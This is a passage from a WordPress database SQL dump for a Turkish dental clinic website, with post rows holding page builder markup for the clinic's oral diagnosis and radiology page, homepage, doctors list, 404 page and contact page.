iki tipi; periapikal (2-3 dişi gösteren, küçük) ve panoramik (tüm alt ve üst dişleri ve çene kemiklerinin tamamını gösteren, büyük) filmlerdir. Bilgisayar destekli bir teknik olan dijital radyografi cihazları da çok düşük radyasyon dozuyla, film görüntüsü üzerinde renk ve ışık oynamalarına imkan vererek, ayrıntılı değerlendirme yapılmasına olanak tanır. Bunların yanı sıra özellikle implant uygulamalarında ve eklem hastalıklarının teşhisinde MR ve BT de istenebilen filmlerdir.\r\n\r\n<strong>Ağız hastalıklarının teşhis ve tedavisi</strong>\r\n\r\nTüm bu yöntemlerle ancak 1/3’ü ağız içinde görülebilen diş yapısının, kalan 2/3’lük bölümü ve çene kemiği içinde kalan iltihabi oluşumlar ile gömülü diş gibi yapıları rahatlıkla görülüp teşhis edilebilir. İyi bir teşhis, doğru tedavi planlamasının yapılabilmesini sağlar. Böylelikle gerekli tüm tedavi ihtiyaçları erkenden belirlenir ve ileride daha büyük sorunlar oluşması önlenir.\r\nOral Diagnoz ve Radyoloji bölümünde, hastaların ilk kayıtları alındıktan sonra, muayeneleri ayrıntılı olarak yapılmaktadır. Daha sonra tedavi ihtiyaçlarına uygun olarak diş filmlerinden bir veya birkaçı alınmakta, tedavi planı tespit edilmektedir.\r\nYapılan tedavi planlamasına uygun olarak, hastalar konularında uzman hekimlere yönlendirilerek tedavileri başlatılmaktadır. Hastaların tedavi planı ve süresi ile ilgili tüm sorularına cevap vermek departmanımızın görevidir.\r\n\r\nHasta dosyasında bulunan kişisel ve tıbbi bilgiler, gizlilik politikamız gereği 3. şahıslarla asla paylaşılmaz.[/vc_column_text][/vc_column][/vc_row]', 'Oral Diagnoz ve Radyoloji', '', 'publish', 'closed', 'closed', '', 'oral-diagnoz-ve-radyoloji', '', '', '2018-07-16 14:36:04', '2018-07-16 11:36:04', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6409', 0, 'us_portfolio', '', 0),
(6410, 1, '2018-07-16 14:35:42', '2018-07-16 11:35:42', '', 'radyoloji', '', 'inherit', 'closed', 'closed', '', 'radyoloji', '', '', '2018-07-16 14:35:42', '2018-07-16 11:35:42', '', 6409, 'http://www.ze-dent.com/wp-content/uploads/2018/07/radyoloji.jpg', 0, 'attachment', 'image/jpeg', 0),
(6411, 1, '2018-07-16 14:36:04', '2018-07-16 11:36:04', '[vc_row][vc_column][vc_column_text]<strong>Oral Diagnoz</strong>\r\n\r\nOral diagnoz, diş hekimliğinde ağız hastalıkları ile ağızda belirti veren sistemik hastalıkların teşhisi ve tedavi planlamasını üstlenmiş ana bilim dalıdır.\r\n\r\nAğız içinde sadece çürük dişler ve iltihaplı diş etleri bulunmaz. Tüm dünyada kabul edildiği gibi çene kemikleri ve eklemi, tükürük bezleri, dil ve ağız içinde görülen tüm yumuşak doku hastalıkları, diş hekimliğini ilgilendiren konulardır. Bu yapı ve dokular, küçük bir alanı kapsamakla birlikte, anatomik olarak karmaşık bir sistem oluştururlar. Birçok sistemik hastalık da ağız içinde önemli belirtiler göstermektedir. Örneğin, şeker hastalığında diş eti hastalığı çok çabuk ilerler. Yine ağız içinde sık ve çok sayıda çıkan aftlar, behçet hastalığının ilk belirtileri olabilir. İşte bu nedenlerden dolayı ağız içi hastalıklarının teşhisi ve tedavi planlaması ile ilgili ayrı bir ana bilim dalı doğmuş; Oral Diagnoz ve Radyoloji de bu görevi üstlenmiştir.\r\n\r\n<strong>Diş Filmleri (Dental Radyografi)</strong>\r\n\r\nAğız içi hastalıklarının -özellikle diş ve çene kemiği gibi sert doku ile ilgili olanların- teşhisinde en büyük yardımcı, dental radyografiler yani diş filmleridir. Diş filmlerinin de en çok kullanılan iki tipi; periapikal (2-3 dişi gösteren, küçük) ve panoramik (tüm alt ve üst dişleri ve çene kemiklerinin tamamını gösteren, büyük) filmlerdir. Bilgisayar destekli bir teknik olan dijital radyografi cihazları da çok düşük radyasyon dozuyla, film görüntüsü üzerinde renk ve ışık oynamalarına imkan vererek, ayrıntılı değerlendirme yapılmasına olanak tanır. Bunların yanı sıra özellikle implant uygulamalarında ve eklem hastalıklarının teşhisinde MR ve BT de istenebilen filmlerdir.\r\n\r\n<strong>Ağız hastalıklarının teşhis ve tedavisi</strong>\r\n\r\nTüm bu yöntemlerle ancak 1/3’ü ağız içinde görülebilen diş yapısının, kalan 2/3’lük bölümü ve çene kemiği içinde kalan iltihabi oluşumlar ile gömülü diş gibi yapıları rahatlıkla görülüp teşhis edilebilir. İyi bir teşhis, doğru tedavi planlamasının yapılabilmesini sağlar. Böylelikle gerekli tüm tedavi ihtiyaçları erkenden belirlenir ve ileride daha büyük sorunlar oluşması önlenir.\r\nOral Diagnoz ve Radyoloji bölümünde, hastaların ilk kayıtları alındıktan sonra, muayeneleri ayrıntılı olarak yapılmaktadır. Daha sonra tedavi ihtiyaçlarına uygun olarak diş filmlerinden bir veya birkaçı alınmakta, tedavi planı tespit edilmektedir.\r\nYapılan tedavi planlamasına uygun olarak, hastalar konularında uzman hekimlere yönlendirilerek tedavileri başlatılmaktadır. Hastaların tedavi planı ve süresi ile ilgili tüm sorularına cevap vermek departmanımızın görevidir.\r\n\r\nHasta dosyasında bulunan kişisel ve tıbbi bilgiler, gizlilik politikamız gereği 3. şahıslarla asla paylaşılmaz.[/vc_column_text][/vc_column][/vc_row]', 'Oral Diagnoz ve Radyoloji', '', 'inherit', 'closed', 'closed', '', '6409-revision-v1', '', '', '2018-07-16 14:36:04', '2018-07-16 11:36:04', '', 6409, 'http://www.ze-dent.com/6409-revision-v1/', 0, 'revision', '', 0),
(6412, 1, '2018-07-16 14:37:57', '2018-07-16 11:37:57', ' ', '', '', 'publish', 'closed', 'closed', '', '6412', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6412', 5, 'nav_menu_item', '', 0),
(6413, 1, '2018-07-16 14:37:57', '2018-07-16 11:37:57', ' ', '', '', 'publish', 'closed', 'closed', '', '6413', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6413', 6, 'nav_menu_item', '', 0),
(6414, 1, '2018-07-23 15:58:47', '2018-07-23 12:58:47', '[vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\"][vc_column][rev_slider_vc alias=\"home\"][/vc_column][/vc_row][vc_row color_scheme=\"alternate\"][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|clock\" size=\"50px\" title=\"Çalışma Saatleri\" type=\"icon_left\" link_text=\"Learn More\"]Pazartesi - Cuma 09:00 - 19:00\r\nCumartesi 09:00 - 17:00[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|certificate\" size=\"50px\" title=\"Uzman Hekimler\" type=\"icon_left\" link_text=\"Learn More\"]Alanlarında uzman doktorlarımız, sağlığınız için, size daha iyi hizmet edebilmek için buradalar…[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|graduation-cap\" size=\"50px\" title=\"Tecrübe\" type=\"icon_left\" link_text=\"Learn More\"]20 yılı aşkın tecrübemizle sizlere hizmet veriyoruz.[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|smile\" size=\"50px\" title=\"Memnuniyet\" type=\"icon_left\" link_text=\"Learn More\"]Önceliğimiz tartışmasız hasta sağlığı ve memnuniyetidir.[/us_iconbox][/vc_column][/vc_row][vc_row content_placement=\"middle\" gap=\"20\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(30,30,30,0.75)\"][vc_column animate=\"afb\" width=\"1/2\"][vc_column_text]\r\n<h2>Diş Hekimi Zeki ERDOĞAN</h2>\r\nDişlerinizin genel durumunun iyileştirilmesi, hem sağlığınız hem de estetik kaygıların önüne geçmeniz açısından çok önemlidir.\r\nDişlerinizde etkili çözümler ve tam kapsamlı bir tedavi için ağız yapısı doğru incelenmeli, gerçekleştirilmesi gereken tedavi yöntemleri belirlenmeli ve etkili bir yol haritası izlenmelidir. Ağız sağlığınıza çok yönlü fayda sunan tedavi yöntemleri ile her açıdan güvenli çözümler elde edin.[/vc_column_text][/vc_column][vc_column animate=\"afb\" animate_delay=\"0.2\" width=\"1/2\"][us_single_image image=\"6543\" size=\"full\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\" overlay=\"black_30\" el_id=\"portfolio\"][vc_column][us_grid post_type=\"us_portfolio\" type=\"carousel\" columns=\"6\" items_gap=\"\" items_quantity=\"\" items_layout=\"6416\" carousel_arrows=\"1\" carousel_autoplay=\"1\"][/vc_column][/vc_row][vc_row height=\"large\"][vc_column animate=\"afb\"][vc_column_text]\r\n<h2 style=\"text-align: center;\">diş bakımı ihmale gelmez,\r\ndüzenli olarak muayene olmayı ihmal etmeyin.</h2>\r\n[/vc_column_text][us_btn text=\"İletişim Bilgileri\" link=\"url:%2Filetisim%2F|||\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"huge\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(25,25,25,0.62)\" el_id=\"second\"][vc_column][vc_column_text]\r\n<h2 style=\"text-align: center;\">Neden<strong> ZEDENT </strong>?</h2>\r\n[/vc_column_text][us_separator size=\"large\"][vc_row_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"20\" title=\"Yıllık Tecrübe\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"79\" color=\"primary\" title=\"Farklı Seminer\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"5000\" suffix=\"+\" title=\"Gülen Misafirimiz\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"14\" color=\"primary\" title=\"Alan Sertifikası\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]', 'Anasayfa', '', 'inherit', 'closed', 'closed', '', '8-autosave-v1', '', '', '2018-07-23 15:58:47', '2018-07-23 12:58:47', '', 8, 'http://www.ze-dent.com/8-autosave-v1/', 0, 'revision', '', 0);
INSERT INTO `zdenl_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(6416, 1, '2018-07-16 15:11:55', '2018-07-16 12:11:55', '{\"title\":\"Portfolyo 9\",\"data\":{\"post_image:1\":{\"link\":\"none\",\"placeholder\":1,\"design_options\":{\"position_top_default\":\"0\",\"position_right_default\":\"0\",\"position_bottom_default\":\"0\",\"position_left_default\":\"0\"},\"hover\":1,\"opacity_hover\":\"0\",\"scale_hover\":\"4\",\"transition_duration\":\"0.4\",\"custom_link\":[],\"media_preview\":0,\"circle\":0,\"thumbnail_size\":\"large\",\"color_bg\":\"\",\"color_border\":\"\",\"color_text\":\"\",\"width\":\"\",\"border_radius\":0,\"hide_below\":0,\"el_class\":\"\",\"opacity\":1,\"scale\":1,\"translateX\":0,\"translateX_hover\":0,\"translateY\":0,\"translateY_hover\":0,\"color_bg_hover\":\"\",\"color_border_hover\":\"\",\"color_text_hover\":\"\"},\"vwrapper:1\":{\"alignment\":\"center\",\"valign\":\"middle\",\"bg_gradient\":\"0\",\"color_grad\":\"rgba(30,30,30,0.8)\",\"design_options\":{\"position_top_default\":\"0\",\"position_right_default\":\"0\",\"position_bottom_default\":\"0\",\"position_left_default\":\"0\",\"margin_top_default\":\"\",\"margin_right_default\":\"\",\"margin_bottom_default\":\"\",\"margin_left_default\":\"\",\"border_top_default\":\"\",\"border_right_default\":\"\",\"border_bottom_default\":\"\",\"border_left_default\":\"\",\"padding_top_default\":\"2rem\",\"padding_right_default\":\"2rem\",\"padding_bottom_default\":\"2rem\",\"padding_left_default\":\"2rem\"},\"color_bg\":\"\",\"color_border\":\"\",\"color_text\":\"\",\"width\":\"\",\"border_radius\":\"0\",\"hide_below\":\"0\",\"el_class\":\"\",\"hover\":\"1\",\"opacity\":\"1\",\"opacity_hover\":\"1\",\"scale\":\"0\",\"scale_hover\":\"1\",\"translateX\":\"0\",\"translateX_hover\":\"0\",\"translateY\":\"0\",\"translateY_hover\":\"0\",\"color_bg_hover\":\"#096fb6\",\"color_border_hover\":\"#096fb6\",\"color_text_hover\":\"#ffffff\",\"transition_duration\":\"0.5\"},\"post_title:1\":{\"link\":\"post\",\"custom_link\":{\"url\":\"\",\"target\":\"\"},\"color_link\":\"1\",\"font\":\"heading\",\"text_styles\":[\"bold\"],\"font_size\":\"1.2rem\",\"font_size_mobiles\":\"\",\"line_height\":\"\",\"line_height_mobiles\":\"\",\"tag\":\"h2\",\"design_options\":{\"position_top_default\":\"\",\"position_right_default\":\"\",\"position_bottom_default\":\"\",\"position_left_default\":\"\",\"margin_top_default\":\"\",\"margin_right_default\":\"\",\"margin_bottom_default\":\"\",\"margin_left_default\":\"\",\"border_top_default\":\"\",\"border_right_default\":\"\",\"border_bottom_default\":\"\",\"border_left_default\":\"\",\"padding_top_default\":\"\",\"padding_right_default\":\"\",\"padding_bottom_default\":\"\",\"padding_left_default\":\"\"},\"color_bg\":\"\",\"color_border\":\"\",\"color_text\":\"inherit\",\"width\":\"\",\"border_radius\":\"0\",\"hide_below\":\"0\",\"el_class\":\"\",\"hover\":\"0\",\"opacity\":\"1\",\"opacity_hover\":\"1\",\"scale\":\"1\",\"scale_hover\":\"1\",\"translateX\":\"0\",\"translateX_hover\":\"0\",\"translateY\":\"0\",\"translateY_hover\":\"0\",\"color_bg_hover\":\"\",\"color_border_hover\":\"\",\"color_text_hover\":\"\",\"transition_duration\":\"0.3\"}},\"default\":{\"layout\":{\"middle_center\":[\"post_image:1\",\"vwrapper:1\"],\"vwrapper:1\":[\"post_title:1\"],\"hidden\":[]},\"options\":{\"fixed\":1,\"ratio\":\"1x1\",\"ratio_width\":\"21\",\"ratio_height\":\"9\",\"overflow\":0,\"link\":\"post\",\"popup_width\":\"\",\"color_bg\":\"\",\"color_text\":\"\",\"border_radius\":0,\"box_shadow\":0,\"box_shadow_hover\":0}}}', 'Anasayfa Hizmet', '', 'publish', 'closed', 'closed', '', 'anasayfa-hizmet', '', '', '2018-07-16 15:14:52', '2018-07-16 12:14:52', '', 0, 'http://www.ze-dent.com/?post_type=us_grid_layout&#038;p=6416', 0, 'us_grid_layout', '', 0),
(6417, 1, '2018-07-16 15:31:22', '2018-07-16 12:31:22', '', 'anasayfa-back', '', 'inherit', 'closed', 'closed', '', 'anasayfa-back', '', '', '2018-07-16 15:31:22', '2018-07-16 12:31:22', '', 8, 'http://www.ze-dent.com/wp-content/uploads/2018/07/anasayfa-back.jpg', 0, 'attachment', 'image/jpeg', 0),
(6418, 1, '2018-07-16 15:33:37', '2018-07-16 12:33:37', '', 'protez-implat', '', 'inherit', 'closed', 'closed', '', 'protez-implat', '', '', '2018-07-16 15:33:37', '2018-07-16 12:33:37', '', 6379, 'http://www.ze-dent.com/wp-content/uploads/2018/07/protez-implat.jpg', 0, 'attachment', 'image/jpeg', 0),
(6420, 1, '2018-07-16 16:15:38', '2018-07-16 13:15:38', '[vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\"][vc_column][rev_slider_vc alias=\"home\"][/vc_column][/vc_row][vc_row color_scheme=\"alternate\"][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|clock\" size=\"50px\" title=\"Çalışma Saatleri\" type=\"icon_left\" link_text=\"Learn More\"]Pazartesi - Cumartesi 10:00 - 19:00[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|certificate\" size=\"50px\" title=\"Uzman Hekimler\" type=\"icon_left\" link_text=\"Learn More\"]Alanlarında uzman doktorlarımız, sağlığınız için, size daha iyi hizmet edebilmek için buradalar…[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|graduation-cap\" size=\"50px\" title=\"Tecrübe\" type=\"icon_left\" link_text=\"Learn More\"]20 yılı aşkın tecrübemizle sizlere hizmet veriyoruz.[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|smile\" size=\"50px\" title=\"Memnuniyet\" type=\"icon_left\" link_text=\"Learn More\"]Önceliğimiz tartışmasız hasta sağlığı ve memnuniyetidir.[/us_iconbox][/vc_column][/vc_row][vc_row content_placement=\"middle\" gap=\"20\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(30,30,30,0.75)\"][vc_column animate=\"afb\" width=\"1/2\"][vc_column_text]\r\n<h2>Dr. Zeki ERDOĞAN</h2>\r\nDişlerinizin genel durumunun iyileştirilmesi, hem sağlığınız hem de estetik kaygıların önüne geçmeniz açısından çok önemlidir.\r\nDişlerinizde etkili çözümler ve tam kapsamlı bir tedavi için ağız yapısı doğru incelenmeli, gerçekleştirilmesi gereken tedavi yöntemleri belirlenmeli ve etkili bir yol haritası izlenmelidir. Ağız sağlığınıza çok yönlü fayda sunan tedavi yöntemleri ile her açıdan güvenli çözümler elde edin.[/vc_column_text][/vc_column][vc_column animate=\"afb\" animate_delay=\"0.2\" width=\"1/2\"][us_single_image image=\"6419\" size=\"full\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\" overlay=\"black_30\" el_id=\"portfolio\"][vc_column][us_grid post_type=\"us_portfolio\" type=\"carousel\" columns=\"6\" items_gap=\"\" items_quantity=\"\" items_layout=\"6416\" carousel_arrows=\"1\" carousel_autoplay=\"1\"][/vc_column][/vc_row][vc_row height=\"large\"][vc_column animate=\"afb\"][vc_column_text]\r\n<h2 style=\"text-align: center;\">diş bakımı ihmale gelmez,\r\ndüzenli olarak muayene olmayı ihmal etmeyin.</h2>\r\n[/vc_column_text][us_btn text=\"İletişim Bilgileri\" link=\"url:%2Filetisim%2F|||\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"huge\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(25,25,25,0.62)\" el_id=\"second\"][vc_column][vc_column_text]\r\n<h2 style=\"text-align: center;\">Neden<strong> ZEDENT </strong>?</h2>\r\n[/vc_column_text][us_separator size=\"large\"][vc_row_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"20\" title=\"Yıllık Tecrübe\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"79\" color=\"primary\" title=\"Farklı Seminer\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"452\" suffix=\"+\" title=\"Gülen Misafirimiz\"][/vc_column_inner][vc_column_inner width=\"1/4\" offset=\"vc_col-md-3\"][us_counter target=\"14\" prefix=\"$\" color=\"primary\" title=\"Alan Sertifikası\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]', 'Anasayfa', '', 'inherit', 'closed', 'closed', '', '8-revision-v1', '', '', '2018-07-16 16:15:38', '2018-07-16 13:15:38', '', 8, 'http://www.ze-dent.com/8-revision-v1/', 0, 'revision', '', 0),
(6422, 1, '2018-07-16 16:19:06', '2018-07-16 13:19:06', '[vc_row height=\"large\"][vc_column width=\"1/3\"][us_person image=\"6221\" name=\"Zeki ERDOĞAN\" role=\"Diş Hekimi\" link=\"|||\" email=\"info@ze-dent.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6220\" name=\"Ayşegül DALKIRAN ARSLAN\" role=\"Doktor (Ortodontist)\" link=\"|||\" email=\"info@ze-dent.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6421\" name=\"Duygu DEMİR\" role=\"Diş Hekimi\" link=\"|||\" email=\"info@ze-dent.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][/vc_row]', 'Hekimlerimiz', '', 'inherit', 'closed', 'closed', '', '1194-revision-v1', '', '', '2018-07-16 16:19:06', '2018-07-16 13:19:06', '', 1194, 'http://www.ze-dent.com/1194-revision-v1/', 0, 'revision', '', 0),
(6423, 1, '2018-07-16 16:22:45', '2018-07-16 13:22:45', '<p>[vc_row height=\"small\" color_scheme=\"footer-bottom\" el_class=\"align_center_xs\"][vc_column][vc_column_text]© 2018 <a href=\"https://themeforest.net/item/impreza-retina-responsive-wordpress-theme/6434280?ref=UpSolution\">Impreza Theme</a> by UpSolution[/vc_column_text][/vc_column][/vc_row]</p>\n', 'Site Footer', '', 'inherit', 'closed', 'closed', '', '5467-autosave-v1', '', '', '2018-07-16 16:22:45', '2018-07-16 13:22:45', '', 5467, 'http://www.ze-dent.com/5467-autosave-v1/', 0, 'revision', '', 0),
(6424, 1, '2018-07-17 12:13:08', '2018-07-17 09:13:08', '', 'adpol', '', 'inherit', 'closed', 'closed', '', 'adpol', '', '', '2018-07-17 12:13:08', '2018-07-17 09:13:08', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/adpol.png', 0, 'attachment', 'image/png', 0),
(6432, 1, '2018-07-17 12:28:06', '2018-07-17 09:28:06', '', 'slider-1-bg', '', 'inherit', 'closed', 'closed', '', 'slider-1-bg', '', '', '2018-07-17 12:28:06', '2018-07-17 09:28:06', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/slider-1-bg.jpg', 0, 'attachment', 'image/jpeg', 0),
(6433, 1, '2018-07-17 12:41:19', '2018-07-17 09:41:19', '', 'slider-implant', '', 'inherit', 'closed', 'closed', '', 'slider-implant', '', '', '2018-07-17 12:41:19', '2018-07-17 09:41:19', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/slider-implant.jpg', 0, 'attachment', 'image/jpeg', 0),
(6434, 1, '2018-07-17 12:48:00', '2018-07-17 09:48:00', '', 'slider-kurum', '', 'inherit', 'closed', 'closed', '', 'slider-kurum', '', '', '2018-07-17 12:48:00', '2018-07-17 09:48:00', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/slider-kurum.jpg', 0, 'attachment', 'image/jpeg', 0),
(6435, 1, '2018-07-17 12:48:03', '2018-07-17 09:48:03', '', 'slider-tel', '', 'inherit', 'closed', 'closed', '', 'slider-tel', '', '', '2018-07-17 12:48:03', '2018-07-17 09:48:03', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/slider-tel.jpg', 0, 'attachment', 'image/jpeg', 0),
(6493, 1, '2018-07-17 13:34:50', '2018-07-17 10:34:50', '[vc_row content_placement=\"middle\" height=\"full\" valign=\"center\"][vc_column][us_iconbox icon=\"fas|exclamation-triangle\" size=\"100px\"][/us_iconbox][us_separator size=\"small\"][vc_column_text]\n<h1 style=\"text-align: center;\">404 Sayfa Bulunamadı!</h1>\n<p style=\"text-align: center;\">Gitmeye çalıştığınız sayfa silinmiş yada adresi değişmiş olabilir\nNavigasyon menülerini kullanabilir yada arama yapabilirsiniz.</p>\n[/vc_column_text][/vc_column][/vc_row]', '404 Error', '', 'inherit', 'closed', 'closed', '', '5774-autosave-v1', '', '', '2018-07-17 13:34:50', '2018-07-17 10:34:50', '', 5774, 'http://www.ze-dent.com/5774-autosave-v1/', 0, 'revision', '', 0),
(6494, 1, '2018-07-17 13:34:40', '2018-07-17 10:34:40', '[vc_row content_placement=\"middle\" height=\"full\" valign=\"center\"][vc_column][us_iconbox icon=\"fas|exclamation-triangle\" size=\"100px\"][/us_iconbox][us_separator size=\"small\"][vc_column_text]\r\n<h1 style=\"text-align: center;\">404 Sayfa Bulunamadı!</h1>\r\n<p style=\"text-align: center;\">Gitmeye çalıştığınız sayfa silinmiş yada adresi değişmiş olabilir\r\nNavigasyon menülerini kullanabilir yada arama yapabilirsiniz.</p>\r\n[/vc_column_text][/vc_column][/vc_row]', '404 Error', '', 'inherit', 'closed', 'closed', '', '5774-revision-v1', '', '', '2018-07-17 13:34:40', '2018-07-17 10:34:40', '', 5774, 'http://www.ze-dent.com/5774-revision-v1/', 0, 'revision', '', 0),
(6495, 1, '2018-07-17 13:50:33', '2018-07-17 10:50:33', '[vc_row height=\"auto\" width=\"full\"][vc_column][us_gmaps marker_address=\"\" marker_text=\"JTNDY2VudGVyJTNFWkVERU5UJTIwJTNDYnIlM0VBJUM0JTlGJUM0JUIxeiUyMHZlJTIwRGklQzUlOUYlMjBTYSVDNCU5RmwlQzQlQjElQzQlOUYlQzQlQjElMjBQb2xpa2xpbmklQzQlOUZpJTNDJTJGY2VudGVyJTNF\" zoom=\"17\" latitude=\"39.922046\" longitude=\"32.853018\" add_markers=\"1\" markers=\"%5B%5D\"][/vc_column][/vc_row][vc_row gap=\"20\"][vc_column width=\"1/3\"][vc_column_text]\r\n<h3>Sosyal Medya</h3>\r\n[/vc_column_text][us_social_links size=\"22px\" items=\"%5B%7B%22type%22%3A%22facebook%22%2C%22url%22%3A%22https%3A%2F%2Fwww.facebook.com%2FZe-Dent-A%25C4%259F%25C4%25B1z-Ve-Di%25C5%259F-Sa%25C4%259Fl%25C4%25B1%25C4%259F%25C4%25B1-Poliklini%25C4%259Fi-1050669254966662%22%2C%22icon%22%3A%22fas%7Cstar%22%2C%22color%22%3A%22%231abc9c%22%7D%2C%7B%22type%22%3A%22twitter%22%2C%22url%22%3A%22%23%22%2C%22icon%22%3A%22fas%7Cstar%22%2C%22color%22%3A%22%231abc9c%22%7D%2C%7B%22type%22%3A%22instagram%22%2C%22url%22%3A%22https%3A%2F%2Fwww.instagram.com%2Fze_dent%22%2C%22icon%22%3A%22fas%7Cstar%22%2C%22color%22%3A%22%231abc9c%22%7D%5D\"][us_separator][vc_column_text]\r\n<h3>İletişim Bilgileri</h3>\r\n[/vc_column_text][us_iconbox icon=\"fas|map-marker-alt\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"İzmir 1 Caddesi Aydın Apartmanı No: 33/22 Kızılay / ANKARA\" title_tag=\"div\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|phone\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"0.312 425 16 56\" title_tag=\"div\" link=\"url:tel%3A%2B903124251656|||\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|phone\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"0.312 232 16 56\" title_tag=\"div\" link=\"url:tel%3A%2B903122321656|||\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|envelope\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"info@ze-dent.com\" title_tag=\"div\" link=\"url:mailto%3Ainfo%40ze-dent.com|||\"][/us_iconbox][/vc_column][vc_column width=\"2/3\"][vc_column_text]\r\n<h3>İletişim Formm</h3>\r\nSoru ve önerilerini aşağıdaki formu doldurarak bize iletebilirsiniz.[/vc_column_text][us_cform receiver_email=\"ze-dent@hotmail.com\" name_field=\"shown\" captcha_field=\"required\" button_style=\"outlined\"]I consent to the processing and storage of my personal data[/us_cform][/vc_column][/vc_row]', 'İletişim', '', 'inherit', 'closed', 'closed', '', '9-revision-v1', '', '', '2018-07-17 13:50:33', '2018-07-17 10:50:33', '', 9, 'http://www.ze-dent.com/9-revision-v1/', 0, 'revision', '', 0),
(6496, 1, '2018-07-17 13:51:09', '2018-07-17 10:51:09', '[vc_row height=\"auto\" width=\"full\"][vc_column][us_gmaps marker_address=\"\" marker_text=\"JTNDY2VudGVyJTNFWkVERU5UJTIwJTNDYnIlM0VBJUM0JTlGJUM0JUIxeiUyMHZlJTIwRGklQzUlOUYlMjBTYSVDNCU5RmwlQzQlQjElQzQlOUYlQzQlQjElMjBQb2xpa2xpbmklQzQlOUZpJTNDJTJGY2VudGVyJTNF\" zoom=\"17\" latitude=\"39.922046\" longitude=\"32.853018\" add_markers=\"1\" markers=\"%5B%5D\"][/vc_column][/vc_row][vc_row gap=\"20\"][vc_column width=\"1/3\"][vc_column_text]\r\n<h3>Sosyal Medya</h3>\r\n[/vc_column_text][us_social_links size=\"22px\" 